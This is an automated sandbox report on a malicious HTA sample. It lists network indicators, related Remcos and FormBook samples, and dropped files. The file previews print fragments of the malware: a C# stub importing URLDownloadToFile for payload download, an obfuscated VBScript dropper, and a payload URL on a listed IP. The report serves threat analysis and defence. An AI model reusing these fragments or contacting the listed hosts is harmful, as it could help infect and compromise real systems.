207.241.227.242	ia600102.us.archive.org	United States		7941	INTERNET-ARCHIVEUS	true
192.3.220.40	unknown	United States		36352	AS-COLOCROSSINGUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1533032
Start date and time:	2024-10-14 10:54:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	na.hta
Detection:	MAL
Classification:	mal100.expl.evad.winHTA@17/18@4/2
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 100% Number of executed functions: 26 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 4304 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 3092 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6548 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:54:57	API Interceptor	41076x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
207.241.227.242	SWIFT 103 202404161508109020 160424-pdf.vbs	Get hash	malicious	Unknown	Browse
	Swift payment Eur 374637.vbs	Get hash	malicious	Unknown	Browse
	10092024150836 09.10.2024.vbe	Get hash	malicious	FormBook	Browse
	Logistics1.vbs	Get hash	malicious	FormBook	Browse
	n92fR6j8tl.rtf	Get hash	malicious	Remcos	Browse
	SWIFT 103 202410071251443120 071024-pdf.vbs	Get hash	malicious	Remcos	Browse
	asegurar.vbs	Get hash	malicious	Unknown	Browse
	Maersk BL, IN & PL.xls	Get hash	malicious	Remcos	Browse
	QPS-36477.xls	Get hash	malicious	Remcos	Browse
	ordin de plat#U0103.docx	Get hash	malicious	Remcos	Browse
192.3.220.40	QPS-36477.xls	Get hash	malicious	Remcos	Browse	192.3.220.40/330/RRCGGH.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ia600102.us.archive.org	SWIFT 103 202404161508109020 160424-pdf.vbs	Get hash	malicious	Unknown	Browse	207.241.227.242
	Swift payment Eur 374637.vbs	Get hash	malicious	Unknown	Browse	207.241.227.242
	10092024150836 09.10.2024.vbe	Get hash	malicious	FormBook	Browse	207.241.227.242
	Logistics1.vbs	Get hash	malicious	FormBook	Browse	207.241.227.242
	n92fR6j8tl.rtf	Get hash	malicious	Remcos	Browse	207.241.227.242
	SWIFT 103 202410071251443120 071024-pdf.vbs	Get hash	malicious	Remcos	Browse	207.241.227.242
	asegurar.vbs	Get hash	malicious	Unknown	Browse	207.241.227.242
	Maersk BL, IN & PL.xls	Get hash	malicious	Remcos	Browse	207.241.227.242
	QPS-36477.xls	Get hash	malicious	Remcos	Browse	207.241.227.242
	ordin de plat#U0103.docx	Get hash	malicious	Remcos	Browse	207.241.227.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INTERNET-ARCHIVEUS	SWIFT 103 202404161508109020 160424-pdf.vbs	Get hash	malicious	Unknown	Browse	207.241.227.242
	Swift payment Eur 374637.vbs	Get hash	malicious	Unknown	Browse	207.241.227.242
	http://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg	Get hash	malicious	Unknown	Browse	207.241.227.241
	10092024150836 09.10.2024.vbe	Get hash	malicious	FormBook	Browse	207.241.227.242
	Logistics1.vbs	Get hash	malicious	FormBook	Browse	207.241.227.242
	n92fR6j8tl.rtf	Get hash	malicious	Remcos	Browse	207.241.227.242
	SWIFT 103 202410071251443120 071024-pdf.vbs	Get hash	malicious	Remcos	Browse	207.241.227.242
	asegurar.vbs	Get hash	malicious	Unknown	Browse	207.241.227.242
	Maersk BL, IN & PL.xls	Get hash	malicious	Remcos	Browse	207.241.227.242
	QPS-36477.xls	Get hash	malicious	Remcos	Browse	207.241.227.242
AS-COLOCROSSINGUS	na.elf	Get hash	malicious	Unknown	Browse	192.3.165.37
	na.elf	Get hash	malicious	Unknown	Browse	192.3.165.37
	sB2ClgrGng.exe	Get hash	malicious	Blank Grabber, XWorm	Browse	198.23.219.104
	na.elf	Get hash	malicious	Unknown	Browse	192.3.165.37
	WC5Gv13cOQ.rtf	Get hash	malicious	Remcos	Browse	107.173.4.16
	uSE8AyujGn.elf	Get hash	malicious	Mirai	Browse	104.170.120.236
	na.elf	Get hash	malicious	Mirai	Browse	198.12.122.175
	BeeaCHpaO4.exe	Get hash	malicious	Remcos	Browse	107.173.4.16
	na.rtf	Get hash	malicious	Remcos	Browse	107.173.4.16
	na.elf	Get hash	malicious	Mirai	Browse	23.94.151.92

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	195560
Entropy (8bit):	3.7210597034966684
Encrypted:	false
SSDEEP:	3072:kXvVPVWplSFblsHb6LBgt5poGwNqmM5pfir3RkQ5Pxl5Ax3pTgROVnjRv:qVPVWpy5sHGXqj2Z5Luh9eOVjRv
MD5:	FFA76C6571F4F3D4E5E256586A8390B6
SHA1:	00854060B1673D298068AAF9248129EFE750EB93
SHA-256:	9E97607E9FB8CA4C56D9754B0A6D3FCD24B9816DC62DE63BE73869B17E5E8B24
SHA-512:	ADC073AEE0AA3C6C7F6BF08606D616BF64F7ECBFA9A095361185DF8D041998505D044306AF933482F11DC6D5D484154954CB315AC8E767DAD19094F9BDDB2C2A
Malicious:	false
Reputation:	low
Preview:	..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .p.l.a.t.i.r.r.o.s.t.r.o.(.a.r.g.i.l.l.i.t.a.,. .s.o.c.r.a.t.i.c.a.m.e.n.t.e.,. .e.s.f.e.n.o.i.d.e.,. .g.a.l.l.i.n.h.e.i.r.a.,. .a.l.a.b.a.r.d.i.n.o.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . .

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1628158735648508
Encrypted:	false
SSDEEP:	3:NlllulP:NllU
MD5:	945462C07AE0FA1CBF07B7C6B820F7E5
SHA1:	DB903671DECE931CB39DBAEB0C294C4C2A189B0E
SHA-256:	7842F5BCAAB0D91923C908EA9CEC346245E993FF228725CF6F7E37F6F31383A1
SHA-512:	8BF0039194755F9236D45B152044C5540C6C613AC30C561708BB81076140FE2EDA8F108651B4C7042F8D7E0714F27269E59B6DC33884CD1067151899808CF520
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
Category:	dropped
Size (bytes):	479
Entropy (8bit):	3.822048982650369
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuQ48QmMCQXReKJ8SRHy4Ht4gNybCFPTlNgYT3/Qy:V/DTLDfuQ4jXfHp9Nybcx6/y
MD5:	BDE88A612A03E923DA5AB7EA68AEC3C7
SHA1:	794B2B8DAFAC37753258A45CCFD9D07647D6B3E2
SHA-256:	2130C7B5A1D3CC5B571622ABF744C66265C625E805EBF608006BB169439922FC
SHA-512:	AB2550558A98FAFE1BCFFC9260D7E8DABDBEB85CD23E291D46161AADC86CBFC853CC0DD3538729ACDCA0402496E94C71F7BC08A85E09BBDC0DF153978B5A78C1
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace ThScHUII.{. public class D. {. [DllImport("uRLmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr tMYmJgj,string mFyVMhW,string ezXEPj,uint ZeixdZoVD,IntPtr mulcefBZ);.. }..}.

C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.190169434191939
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fooV3Gzxs7+AEszI923fooV3V9:p37Lvkmb6KzAI3GWZE2AI3b
MD5:	A35D0309FC3B74DDFE0F96283C896B5E
SHA1:	ABF32C4C7A95720DEA6EAA9E79D7512204EC8182
SHA-256:	BC8BD6FADC6B9BE62F8ECD7DE55D1C89DEAD1DB49B3418AB7DA6F4D227FCB0D5
SHA-512:	C5E342B124C19008146704C3164C145095548E99758B50714A500BDE6DBE5AE2FAAB2A0CA0690EF46B5585585D82CA0ED137F795D1912BF26DB0C37A32484F19
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.0.cs"

C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.83259284413624
Encrypted:	false
SSDEEP:	24:etGSfPBe5ekrl8y7+9Uuk5eeCa0U9MJO7tkZfg9CbCZ0WI+ycuZhNEakSQPNnq:6oskr+lUtvCU9MDJg9CbCZX1ulEa3Iq
MD5:	1A526DEB1B8C2FDF8F42416ADADE5FAB
SHA1:	6BBA09451CBD6F9FF0BF7C29B8364E13A080202E
SHA-256:	63152638B0CA20A733F4241009FDE3D65B6EBD5A3ACDD89164D5F996757F6AA1
SHA-512:	E89A0F381EF474052365ADC2BC411F5F5359394812495B7F880B8C97A57653839269BB2D1DCCC1FDC889B2545985BB46FBBC43389C127034DFE91B595D117BBB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....{.....{.......................................... 9.....P ......K.........Q.....Y.....a.....h.....r...K.....K...!.K.....K.......!............9......................................."..........<Module>.0r

C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
Category:	modified
Size (bytes):	870
Entropy (8bit):	5.292556114479513
Encrypted:	false
SSDEEP:	24:KMoqd3ka6KzJXE2JaKax5DqBVKVrdFAMBJTH:doika6aJXE2JaK2DcVKdBJj
MD5:	9A9F3FE037569C4E3D36F9EEC211BB61
SHA1:	6538244BA5366D21F1468F0A556B38A7877D4E2C
SHA-256:	108999EC12C0ACA1AE0FE2C5D618AA1B6EE2DCDB2632718B32B356DA19B11362
SHA-512:	F06E5C6ECA05A1CBB7A458099B9A34999726D4833F84C0A380B196791BE015A682C1D27404B3AF9DDBD8CC2414B10C4447EA4A3EA629A106577BD4A79B2144BA
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0836583230480645
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyak7YnqqQPN5Dlq5J:+RI+ycuZhNEakSQPNnqX
MD5:	91F3B30EC33E89D39F5441435AD54B70
SHA1:	13EC852152D12A9EB49C5A121B5BC82B9FFA265D
SHA-256:	CE6D4B86F11349105BD240C00383D1D43065AC2FC36077449A7159A432D7103F
SHA-512:	5BF2942E3038C195D59118D2B5926C1DB9988DF21B0049DE0BF2C0D98F4E0F39B8B83E9ED173C25D85C6C812E2A328FAEF7FE6D6C02ABABE884D21FFB21A23DD
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.r.f.a.j.t.3.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.r.f.a.j.t.3.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES15CB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Oct 14 10:10:16 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	3.9681739502985134
Encrypted:	false
SSDEEP:	24:H5m9p6FHywKTFexmfwI+ycuZhNEakSQPNnqSSd:Y6FpKTAxmo1ulEa3IqSC
MD5:	249A7C58F82B085F0FBDD935190FDA3D
SHA1:	6BD4558858222E0D36FFF5BDE79D1F010FD17FE4
SHA-256:	3585927C61C92CA94ECD6A1BAB719C45D4DF2C787A5A3BA641F94B277FE212B1
SHA-512:	28B3461F064EE1DC8AFD412372A2FADCA6DDD0D9DFD5351B74547C4F87EC0FD606F90C150A0CF010A370C9A5024FE286756918C67D7B93DA880306A45203AEE5
Malicious:	false
Preview:	L......g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP......................>..TACZ.Kp..........5.......C:\Users\user\AppData\Local\Temp\RES15CB.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.r.f.a.j.t.3.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awikqj3p.32t.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ia1s23iz.eys.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lczi1jlh.nav.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qs11iz2s.ntg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnuasuvz.ula.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulas1yit.wkq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yosati0i.hkt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zo3v0nrn.1ak.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	195560
Entropy (8bit):	3.7210597034966684
Encrypted:	false
SSDEEP:	3072:kXvVPVWplSFblsHb6LBgt5poGwNqmM5pfir3RkQ5Pxl5Ax3pTgROVnjRv:qVPVWpy5sHGXqj2Z5Luh9eOVjRv
MD5:	FFA76C6571F4F3D4E5E256586A8390B6
SHA1:	00854060B1673D298068AAF9248129EFE750EB93
SHA-256:	9E97607E9FB8CA4C56D9754B0A6D3FCD24B9816DC62DE63BE73869B17E5E8B24
SHA-512:	ADC073AEE0AA3C6C7F6BF08606D616BF64F7ECBFA9A095361185DF8D041998505D044306AF933482F11DC6D5D484154954CB315AC8E767DAD19094F9BDDB2C2A
Malicious:	true
Preview:	..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .p.l.a.t.i.r.r.o.s.t.r.o.(.a.r.g.i.l.l.i.t.a.,. .s.o.c.r.a.t.i.c.a.m.e.n.t.e.,. .e.s.f.e.n.o.i.d.e.,. .g.a.l.l.i.n.h.e.i.r.a.,. .a.l.a.b.a.r.d.i.n.o.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . 